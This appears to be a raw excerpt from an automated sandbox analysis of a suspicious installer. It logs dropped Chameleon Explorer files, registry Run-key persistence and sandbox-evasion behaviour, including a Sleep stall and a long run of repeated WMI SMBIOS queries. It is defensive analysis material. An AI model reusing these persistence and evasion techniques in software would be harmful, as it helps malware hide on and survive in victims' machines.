                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy)
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe File created: C:\Users\user\AppData\Roaming\cexplorer.exe
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backup
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\is-F1F8N.tmp
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exe File created: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy)
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\is-GJT7J.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\is-KSQ9G.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\is-SCGGO.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy)
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe File created: C:\Users\user\AppData\Roaming\update.exe
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backupJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backupJump to dropped file
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJump to dropped file

                    Boot Survival

                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chameleon Folder
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp; File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon Explorer
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp; File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon Explorer\Chameleon Explorer.lnk
                    Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 21_2_00417236 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\cexplorer.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\update.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe; Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Roaming\update.exe; Stalling execution: Execution stalls by calling Sleep
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe; WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
